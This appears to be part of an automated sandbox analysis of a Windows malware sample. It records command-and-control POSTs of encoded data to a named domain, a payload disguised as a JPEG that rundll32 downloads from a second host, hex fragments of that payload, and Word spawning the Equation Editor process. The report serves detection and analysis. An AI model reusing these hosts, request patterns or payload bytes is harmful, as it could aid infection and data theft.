                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:05:20.660856009 CET548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:20 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                                Nov 11, 2024 10:05:20.876156092 CET548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 09:05:20 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.224917615.197.148.33802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:26.088202953 CET2472OUTPOST /tqdg/ HTTP/1.1
                                                                                                Host: www.maryneedskidneys.info
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.maryneedskidneys.info
                                                                                                Referer: http://www.maryneedskidneys.info/tqdg/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 32 77 79 65 75 61 6e 73 78 56 61 38 45 71 61 4a 6e 4f 44 75 49 79 70 2b 78 75 52 42 38 5a 6b 68 48 48 35 64 48 68 62 70 6d 39 34 2f 67 44 49 59 6d 52 46 53 44 66 38 66 39 46 63 53 4b 2f 4a 36 73 6b 30 32 6b 77 50 33 67 70 69 52 58 31 37 30 36 49 75 38 6e 30 31 46 61 65 50 49 4d 4d 68 69 54 4e 49 69 4c 65 74 69 37 34 56 44 76 45 74 42 54 44 6b 75 6e 52 4f 36 4f 41 2f 49 75 44 4d 7a 63 2f 37 67 45 69 7a 49 55 71 55 77 6c 5a 78 7a 7a 58 37 71 73 46 5a 72 54 4f 68 5a 67 62 57 53 59 59 6a 69 43 75 45 65 69 48 69 66 79 4b 79 69 6d 68 5a 57 37 46 62 30 6e 71 69 36 62 69 71 30 75 6c 47 75 47 76 41 70 38 6b 50 66 31 4e 50 43 4b 51 45 65 57 52 37 70 79 6e 6b 78 56 4c 52 35 35 39 39 74 6d 36 37 68 30 4d 55 54 44 52 76 43 6c 4c 4d 61 41 67 33 31 33 4e 35 58 71 67 4f 49 36 55 69 65 6e 58 57 75 67 42 74 62 7a 74 38 6b 43 4b 4d 48 4c 6c 46 72 67 48 56 76 67 33 63 47 68 37 4d 49 54 30 79 69 67 6d 51 31 39 77 79 68 31 58 61 48 6d 4b 79 66 46 50 4a 38 73 31 33 2b 4c 6c 6b 6f 33 6e 44 45 52 75 [TRUNCATED]
                                                                                                Data Ascii: S6g0i61=2wyeuansxVa8EqaJnODuIyp+xuRB8ZkhHH5dHhbpm94/gDIYmRFSDf8f9FcSK/J6sk02kwP3gpiRX1706Iu8n01FaePIMMhiTNIiLeti74VDvEtBTDkunRO6OA/IuDMzc/7gEizIUqUwlZxzzX7qsFZrTOhZgbWSYYjiCuEeiHifyKyimhZW7Fb0nqi6biq0ulGuGvAp8kPf1NPCKQEeWR7pynkxVLR5599tm67h0MUTDRvClLMaAg313N5XqgOI6UienXWugBtbzt8kCKMHLlFrgHVvg3cGh7MIT0yigmQ19wyh1XaHmKyfFPJ8s13+Llko3nDERuDGHY0eYF0JLzsqnsNgg80Cgl0FAsYUYqYtKMFikecVZzh9nQdRZ8cicd+7XsR9IZx2hTaoOsRg9HqNckEeU36GTBqAJPeWPh86iqo8n6YxOfCNRjnkm7OS3r1o/+gcu7CuKqMNeCfLBo51yjpPBMPA0AMltddIwew2l4wLHcytFBYIIGjwRctT4om068e1Xq0T+ftCNn25KeL+20OgpycQlWhRMt1IYO1HTAa4olt3UVLrvYgJ6kGbVNY1st1VmANUaK0EH+jqiR3YepFu8a9DR/GoEriHZri3wQNgHQKar3HmYGnSwQYlgMeFBruwSVecBPYUmzaADYL/wqLKElKpqDbipBgCvaNdPMD1ujN97VqHB7BKyIPL7V2Z1Mabh390P+6XmDdE9bwEKRoDazy/l7eAFcs5wd9GLQeR+8b2nU31eoxPXv6R7EkvZXWNmwUl13LfNAFFDgW+4cSwVu9h72HgEUh8hZVtjno97S+WWKkLVtaV1m1wFMGCbeUSjpd+0tuLVAcTLiP8imBCB5v/cDvZ44GLPgBJhvVZnQ6fT2/I7qLjkXvevBXUa4e0nAkqZLyCubOts+DAlYas1X8GH1XD+jmsuF+p+ZN1DTkDpgVLUWGsnB+q2f5nTU4ZqlL0hkLBZnyUkht+8Ms20yih2s1YKeESfKey [TRUNCATED]
                                                                                                Nov 11, 2024 10:05:26.093313932 CET177OUTData Raw: 75 70 70 73 63 55 53 64 50 45 6a 49 64 46 50 7a 73 51 70 66 64 46 74 6f 58 59 36 61 2b 34 64 77 38 64 48 2f 79 69 34 38 48 6f 63 4b 64 30 39 75 6d 57 4f 71 32 4e 5a 4e 39 53 6a 34 50 6e 38 6f 2b 45 78 6c 62 6e 59 36 34 4a 2f 6d 51 71 64 48 4a 30
                                                                                                Data Ascii: uppscUSdPEjIdFPzsQpfdFtoXY6a+4dw8dH/yi48HocKd09umWOq2NZN9Sj4Pn8o+ExlbnY64J/mQqdHJ0X2b4UIZ6QH9PsOYih79WOPytL8QmTj1+9Fs9kJfHQVs3ncaJLCSDLQOkayJX+Agyq3aeSz5Pn+OcDLNQ/67DgMpZ2Z21l9l


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                15192.168.2.224917715.197.148.3380
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:28.929763079 CET688OUTPOST /tqdg/ HTTP/1.1
                                                                                                Host: www.maryneedskidneys.info
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.maryneedskidneys.info
                                                                                                Referer: http://www.maryneedskidneys.info/tqdg/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 32 77 79 65 75 61 6e 73 78 56 61 38 45 70 79 4a 6c 66 44 75 4b 53 70 2b 77 75 52 42 79 35 6b 6e 48 48 31 6a 48 6b 72 44 6c 4d 38 2f 67 32 73 59 6e 6a 39 53 45 66 38 59 32 6c 63 57 48 66 49 34 73 6b 31 56 6b 30 50 33 67 70 47 52 55 58 44 30 72 5a 75 39 34 55 31 62 44 75 50 56 4d 4d 74 52 54 4e 56 6c 4c 66 56 69 37 35 70 44 75 45 39 42 44 78 38 75 79 78 4f 38 65 77 2f 6c 75 44 41 69 63 35 62 6f 45 69 50 49 56 66 30 77 69 49 52 7a 67 58 48 71 31 56 5a 71 5a 75 67 73 6d 62 44 44 51 4a 2f 53 4f 65 30 6a 69 6c 2f 34 33 49 32 34 6a 54 4a 41 37 32 76 41 75 75 54 59 66 32 48 65 73 51 3d 3d
                                                                                                Data Ascii: S6g0i61=2wyeuansxVa8EpyJlfDuKSp+wuRBy5knHH1jHkrDlM8/g2sYnj9SEf8Y2lcWHfI4sk1Vk0P3gpGRUXD0rZu94U1bDuPVMMtRTNVlLfVi75pDuE9BDx8uyxO8ew/luDAic5boEiPIVf0wiIRzgXHq1VZqZugsmbDDQJ/SOe0jil/43I24jTJA72vAuuTYf2HesQ==


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.2249161153.121.40.914433488C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-11 09:03:22 UTC227OUTGET /~lizard581/cgi-bin/imageup/data/1424.jpg HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                                Host: www.diced.jp
                                                                                                2024-11-11 09:03:23 UTC245INHTTP/1.1 200 OK
                                                                                                Date: Mon, 11 Nov 2024 09:03:23 GMT
                                                                                                Server: Apache
                                                                                                Last-Modified: Fri, 08 Nov 2024 18:13:09 GMT
                                                                                                ETag: "b61102-46200-6266ab40e2a20"
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 287232
                                                                                                Connection: close
                                                                                                Content-Type: image/jpeg
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: 94 c2 e8 9f a7 f1 7b f3 5b 9f 51 63 23 42 fd 65 c0 3f 0b 2e 80 b5 da 6a 03 9f a4 fe e3 67 ac c1 1f 42 4b f7 6c 30 58 d2 ad 24 71 6a 56 60 b1 44 9b 5b 61 a4 79 81 81 13 cb 95 ab 9e df 5c 9f 47 dd 4a 28 10 d9 a5 09 a9 f5 c1 b7 39 e0 5f f7 f3 51 d0 97 1a 28 53 06 f0 f0 80 56 49 3f 79 ee 28 3d 5c 2f 60 46 19 4a 8c 6d 3b f4 a0 8b b6 ac 3c 81 e5 2a cc 02 f7 c1 df 5b c3 e0 7f 5d 1e 32 fd d7 9c 76 71 57 e6 7a 9f 16 f9 ae 4d 16 0a 7a 47 28 41 17 7e 0d e8 3b 3d e0 93 64 cc 74 a1 10 47 a9 57 fa 08 7a 98 ba 13 a2 4a 59 83 db 89 6a b5 c8 f8 ce 6c a2 03 15 48 cd 91 c1 87 f2 b3 f6 eb ec 08 6e c9 6f 23 58 0a b6 24 04 30 c0 eb 98 a2 a7 09 27 5e c0 4a 58 3a 67 e8 36 82 5f 22 99 e2 b2 9f e1 3b 79 c2 6f cd 1a 92 8b 84 6b 04 c7 86 e5 c0 5c 74 5f 7f bb 8f 3e 20 14 c9 6e 28 2f
                                                                                                Data Ascii: {[Qc#Be?.jgBKl0X$qjV`D[ay\GJ(9_Q(SVI?y(=\/`FJm;<*[]2vqWzMzG(A~;=dtGWzJYjlHno#X$0'^JX:g6_";yok\t_> n(/
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: be 57 a0 ee 32 c8 c9 94 e5 a0 fb da d1 ec b5 17 ea d0 5b bd b5 1d 1d 77 0d 07 db 4a 0d 6e 5d 19 d0 e5 1e 9e 47 1e bf aa 22 20 fd 6c ae d9 ae b5 ef af ca 33 4f ca b3 55 34 5e f6 36 73 5a fd 8d 11 9c 2d d4 70 97 79 ab 61 3d 07 24 45 bb 51 3a b3 50 e2 d4 59 c1 8d af db 64 29 90 0a 32 cb 78 87 43 67 6e 82 1b 4d e7 f8 f2 70 cc f2 f9 17 f6 02 c4 ce 1b 9e eb 97 b8 e0 95 ce b1 09 8f 70 be ae 6b 14 96 8e 83 62 64 fa 0d 88 9d be 34 3f 07 18 f4 e9 61 2c 24 cd f7 e2 c9 33 f4 d1 d3 05 24 ac 34 b3 98 49 d0 e2 d1 4e 89 2f d7 e6 0a a5 ce e0 2a bf 4b 9d c2 a6 8a 18 1c cd 2a 41 7b d1 3e 07 0d df 0d 30 12 8c 9e 59 bc cb e7 ee 59 00 e3 a2 91 bc 5b 31 a8 b4 21 29 e5 bd e0 e7 66 0b 78 2b b3 41 3b ba ed dd 10 4f d2 50 6e 79 fd c6 b9 5f b1 7a 8a db 10 b0 8c a8 1d 8c 60 b3 8e a6
                                                                                                Data Ascii: W2[wJn]G" l3OU4^6sZ-pya=$EQ:PYd)2xCgnMppkbd4?a,$3$4IN/*K*A{>0YY[1!)fx+A;OPny_z`
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: 25 31 33 81 45 30 da 0f 4d 22 26 18 99 1b f4 26 d7 d5 8e dd 32 ff ec 7e 9b f0 0a a0 bf 45 c5 1b df d8 11 31 05 7e 3d 39 d2 f1 03 45 72 f9 0e fd 97 aa bb 7a a7 fa 68 91 ce de 00 2d f9 47 b3 4d 1a 49 b6 0a e9 f7 51 9b 99 f8 92 50 00 a9 fd 4a cb 4e b0 86 64 c5 6e 2f 4a c1 b0 d2 fe 10 e8 a5 34 0d db 44 79 91 35 fd 01 53 9f c8 3c 51 91 8d 0c d0 2b b2 92 c9 10 bb 79 94 90 db c8 f7 31 ab 9f 45 27 06 f6 e0 c0 3c f1 56 c2 61 d3 32 c2 59 f4 35 6b db aa be 12 a9 8b a2 f6 31 27 08 2c be 32 b2 13 90 bc 3c f6 99 98 48 dd c6 f9 a7 fd 55 39 ab 84 50 19 e6 a1 4e d5 d9 e0 37 f1 4f e0 57 72 30 2a 50 55 7b 1c a1 61 65 f9 85 a4 5a f3 30 22 4c 17 ac b6 e5 f1 ad e5 f4 5b d2 52 29 86 56 3c 7f e0 18 90 e6 33 b1 c4 d4 5e 95 d4 57 a5 2b a0 57 03 52 b2 82 09 77 83 9d a6 01 6b 00 9e
                                                                                                Data Ascii: %13E0M"&&2~E1~=9Erzh-GMIQPJNdn/J4Dy5S<Q+y1E'<Va2Y5k1',2<HU9PN7OWr0*PU{aeZ0"L[R)V<3^W+WRwk
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: 60 04 96 4c e6 4b 14 31 15 8d a5 be cd 31 14 6b c2 f7 2f 74 0c 0c 41 a5 77 4f b6 32 a4 84 99 6d 83 90 8c 7d 90 50 e4 88 f2 22 8b e2 57 e1 3c 47 36 58 50 12 2e 0c c4 35 0f 53 73 ee 8d e5 9c 03 5a 48 f6 91 50 6c 80 29 78 98 a3 37 ad 1d 16 ae 0d d7 b3 ff 75 95 3e f1 ee 42 1b 19 87 cb 4d 30 21 65 66 65 8b 7a 40 28 d9 49 dc 98 5f 32 40 a9 51 f6 bf 14 dc b8 34 93 75 5f 59 fb 89 9e fe 9a 54 94 7d fd c9 ee fd f6 e9 67 6a 29 05 e5 c5 0e 9b 18 6a ad e5 c5 2d 76 b9 1c 1b bd 03 4b b1 2b 17 88 4a 67 95 2e 9b b2 7e 0d 41 b0 99 0d f6 6c f4 14 ea 43 bf 8c 0b 2d a4 a7 a3 06 ed 0e ab 03 b8 b8 3a d3 08 ad 72 10 3f 1a e9 a1 e1 bf 0c 21 2e 3f 9a be 34 8c ec 0b c9 48 47 48 43 84 48 3f 8c 03 29 e7 c2 99 08 65 60 cc c4 15 5a 7d 49 2b e9 80 17 d0 a7 d2 2e a8 24 1c be fc 76 34 3e
                                                                                                Data Ascii: `LK11k/tAwO2m}P"W<G6XP.5SsZHPl)x7u>BM0!efez@(I_2@Q4u_YT}gj)j-vK+Jg.~AlC-:r?!.?4HGHCH?)e`Z}I+.$v4>
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: cd 19 12 83 81 e4 c9 85 c1 c8 a8 ad ad 96 2f 6a 49 8e 5d ac 1a 81 91 71 39 9b 7b 3d 98 d1 02 cc 26 5c 32 d5 68 7c f1 88 0d b0 b4 82 55 34 75 97 20 72 7e 6d 2e e1 84 17 8b 92 e9 c7 54 18 82 46 ac 2a e7 4b 5c 99 f7 0b 12 54 35 7d 50 2b 32 0a ae c8 20 80 cb 90 c9 5e 84 5f ac 4d ce 29 c8 2c ac 25 67 31 18 f0 45 12 0a 84 98 69 13 14 82 9c b7 e7 32 1b e9 52 21 c7 36 9c 4a e0 90 28 ab e1 29 60 c3 c9 b6 ad 56 d0 1b c3 41 f4 c7 69 cb af be 81 12 eb c9 b6 eb 6d 0f 45 2c 15 bc c3 d5 29 68 1c bb b5 31 60 43 b9 4d 92 09 ec d2 e9 98 56 b5 66 f0 0a f0 95 89 b9 ac 67 7e df 88 d0 4a 86 09 35 3d 49 82 d7 16 ad 0c fb 25 31 f3 3d d7 48 f9 dc 1f 2a f8 49 9a a7 95 6c f3 4b 8e df 49 7c 8c e3 7d de 0e 2b 45 fa e0 b9 79 08 07 33 8a 02 0f d3 90 a2 07 af ff 24 54 59 6d b3 53 59 71
                                                                                                Data Ascii: /jI]q9{=&\2h|U4u r~m.TF*K\T5}P+2 ^_M),%g1Ei2R!6J()`VAimE,)h1`CMVfg~J5=I%1=H*IlKI|}+Ey3$TYmSYq
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: 30 0d ae 38 47 62 12 f0 e2 9a 15 0a 58 f8 6f f9 c0 cf 90 e8 87 50 6b 8d 75 96 a8 3b ec e8 dc de 51 ff 64 44 0c b2 27 7c 9b 01 93 f9 83 c1 48 d4 9d fc e0 03 61 ba 6f 6a 90 79 f6 fb ae 7d c1 9a 58 8f c4 17 64 7a d6 d7 6e ee b1 6f 34 6f 76 06 cf 9f 2e ad c3 e1 ce f6 7d 59 89 4b 45 35 4c 2b 49 45 bc 77 d0 48 12 be 0f 72 93 8a 0e fa c4 7e b5 5b dc 6d d5 5f aa 8b 46 91 96 0c 57 c8 3a d5 99 51 54 4b 29 8d 03 d7 d6 e5 4b ad 3a 0e 38 ca a6 96 05 a6 0d b1 aa 05 ac 9c e1 e3 a8 2a 10 53 61 1d 7f 74 e9 e2 1c 6b 3c 94 33 01 6f a9 e4 65 30 3e b8 0c fa fa 42 fc 0d 5f d5 71 2c 21 5b 01 67 6e b9 0b ac 09 53 ec 5b 5c af 70 f1 1e 21 89 43 29 49 91 65 2d 78 11 a8 57 2a 25 59 57 49 f6 3c 26 57 a7 34 1a 27 0a 0a b5 8b 42 0e 6a 4b 1a 06 d8 2b d2 22 bd ec ca c5 99 4f 51 88 e2 e5
                                                                                                Data Ascii: 08GbXoPku;QdD'|Haojy}Xdzno4ov.}YKE5L+IEwHr~[m_FW:QTK)K:8*Satk<3oe0>B_q,![gnS[\p!C)Ie-xW*%YWI<&W4'BjK+"OQ
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: 9c 25 bc 5f df 29 dc 30 1e e9 2b 55 72 97 91 4a 78 49 2e ec 3b 5d ae 59 70 cf 18 3b 60 89 74 75 12 e9 2e 00 c0 d4 e1 b2 b7 8c 78 57 9d 76 c2 39 fc 81 c7 a8 48 84 9d e2 09 fa da d8 c6 5f 21 58 c7 eb 87 f5 6b 1c ac 9d 24 24 07 8b 65 f6 ed 9b 00 f0 cf a9 cb a9 cc 32 21 21 01 16 c1 ca e9 89 49 9f f4 5c f3 b6 ef fe ad 0d 9d fb a0 07 13 20 7c 18 fc c0 fa 7d 21 af 42 40 6d 01 0c b0 39 24 73 41 d2 74 6f c8 21 dd fb 78 38 4f e5 2f 00 53 61 90 ee 28 33 eb e4 49 59 d3 67 0c a0 20 44 05 95 9b 16 92 2a 08 6c 3c a6 f0 68 f9 f0 31 c8 ef 3a 4f 66 54 5a e4 a4 d4 73 a5 a7 ba db de a0 fe 08 32 9f 8b 9d c5 b7 ee 00 d8 60 21 1b c4 8c 2a c8 e5 f0 e2 41 df 85 9a 9c 0d a7 d1 50 28 38 01 f3 40 ad 93 27 4a 0e a7 b3 a8 c6 31 2f 65 3b ec 20 dc 1c 58 90 55 f8 4d bc 6c 29 e5 21 d4 9d
                                                                                                Data Ascii: %_)0+UrJxI.;]Yp;`tu.xWv9H_!Xk$$e2!!I\ |}!B@m9$sAto!x8O/Sa(3IYg D*l<h1:OfTZs2`!*AP(8@'J1/e; XUMl)!
                                                                                                2024-11-11 09:03:23 UTC16384INData Raw: 76 a6 86 f4 09 4b 8e db 06 0c 28 a2 4c d3 59 54 79 7a 0d 7d 47 69 f1 53 d0 4d 2b e7 49 72 6b c3 27 d3 cb ce ce e6 78 17 05 bd 86 eb 38 0f 1f 23 a4 0e 24 84 2d b4 3c 7a ae 0f 16 0a 38 9f bb ab c6 27 8a f3 05 01 56 fa b5 94 dc 33 fa 80 19 27 c8 2d a0 a4 c1 2c 25 4b 35 21 37 6b d1 e8 c6 cc 30 17 64 bc 4d 5f 5c 54 26 3b 1d e8 c6 4a 85 e9 6f 26 a0 32 2e e8 24 da f8 69 92 70 58 56 f5 37 b6 a1 e4 3a 44 b3 ac 40 81 bd eb 0e df 60 f3 a5 79 7d e5 b8 bf 1b 86 87 ae 88 29 f7 82 7a 91 29 9f 32 f9 ac 32 c3 fa a3 1d b7 c8 f9 a1 7b e7 5a 78 5f ff 01 b7 4b 60 20 a4 c0 00 48 c0 98 97 aa 5c f3 b7 d2 93 68 ca cb 85 15 6c 1c 8f 7c 3f 8f 3c 0d 4b 25 bd 69 67 e2 2b 61 38 d4 2f 8d cb cf 66 a1 13 85 a1 02 78 fc cc e2 70 48 2c de 45 08 04 a7 3f fd 55 48 06 85 56 8f bf f0 35 1b 15
                                                                                                Data Ascii: vK(LYTyz}GiSM+Irk'x8#$-<z8'V3'-,%K5!7k0dM_\T&;Jo&2.$ipXV7:D@`y})z)22{Zx_K` H\hl|?<K%ig+a8/fxpH,E?UHV5
                                                                                                2024-11-11 09:03:24 UTC16384INData Raw: 90 1b 84 e9 99 e4 10 fd a0 d6 ac 3e 0c 50 eb 0e f6 ba 72 74 c6 c4 e9 3f ee 92 63 e3 ec fa ce 2f 21 ea c1 e4 e3 90 c0 31 78 4b 20 7d ee 18 de e8 b3 61 45 5a 49 7f e4 f3 c1 43 ba a4 17 4a e4 36 28 70 f9 1f d1 ba 5a 8f 72 26 3f 1f 53 e8 ca 9f c5 f2 ee 70 20 d5 2b cb 1d 75 45 f9 74 9e b2 39 da 42 74 7d 46 38 58 75 1c 8a e4 ab f7 ef ea ed 4b 8d de 61 e9 a6 d7 3f 2f ab d9 10 f9 71 23 9e 3a 11 87 d1 1c 5b fe 11 91 24 98 6f 45 e0 68 fe d6 32 6a cf e9 21 8c 61 74 af f0 6b 6a dd 42 a8 cb f8 c9 13 09 a2 53 96 57 d4 c4 d5 66 d1 cb 76 e4 f7 64 36 00 10 74 97 1e ad d1 45 47 e7 6a 23 ba 12 f0 c4 33 2e 0b 06 59 6f 59 6b 98 1e 92 3d 98 2e 92 f3 de b3 19 5c 2d 15 00 86 0e 04 96 4c c2 78 ce 04 a4 72 00 a2 af 4e 64 93 c8 32 91 1a 74 93 65 e0 50 e6 90 52 35 da c1 5a 5c 53 c5
                                                                                                Data Ascii: >Prt?c/!1xK }aEZICJ6(pZr&?Sp +uEt9Bt}F8XuKa?/q#:[$oEh2j!atkjBSWfvd6tEGj#3.YoYk=.\-LxrNd2tePR5Z\S
                                                                                                2024-11-11 09:03:24 UTC16384INData Raw: 5d cd 79 5a 1d 43 f2 87 f3 6f d6 aa b7 a8 fa 44 96 ce e2 1d 85 f0 a0 b4 78 e3 82 bc d2 12 d9 7b 92 ae ec 76 bb a7 86 a3 83 e4 f6 8f 34 c6 bd d9 0f 22 de 3f 15 07 df d8 d4 22 dd 5f 21 e5 ed 4b a6 02 05 df 2f 18 b3 aa 75 46 aa 0e db 2a 3c f0 ae 57 61 12 b6 06 41 40 9b ab 7c 5f 36 16 89 d1 32 5d f4 b3 b8 12 25 ad 55 07 5c 93 fc f3 b9 cd 36 72 ad ec a1 ae d4 46 9e 9b 2b 55 ab ae 25 ce 1d f8 b0 c5 f5 b8 3d 37 f8 85 75 94 e3 11 a8 8e 6c c8 5a 1a b3 1c 47 be 82 4c d4 7b 39 b8 c5 ac bf 40 11 90 77 54 ae 5f cb 71 13 b6 b4 7d b7 df 05 5e c3 bc 4d 45 e6 a9 6d af 3b 2d da cf 23 33 a0 a9 99 5e be a3 78 c6 03 cb 69 a0 93 0a c3 96 8b 94 43 93 83 5a 13 95 12 1f 7a c4 65 26 f7 cb a3 f9 44 38 17 c8 6f 2e 0e 03 d8 af 9e be 5d 30 76 5c 7d a9 46 73 48 f6 4c 13 59 a7 13 8a 0f
                                                                                                Data Ascii: ]yZCoDx{v4"?"_!K/uF*<WaA@|_62]%U\6rF+U%=7ulZGL{9@wT_q}^MEm;-#3^xiCZze&D8o.]0v\}FsHLY


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:04:03:16
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                Imagebase:0x13f4e0000
                                                                                                File size:1'423'704 bytes
                                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:04:03:19
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                Imagebase:0x400000
                                                                                                File size:543'304 bytes
                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
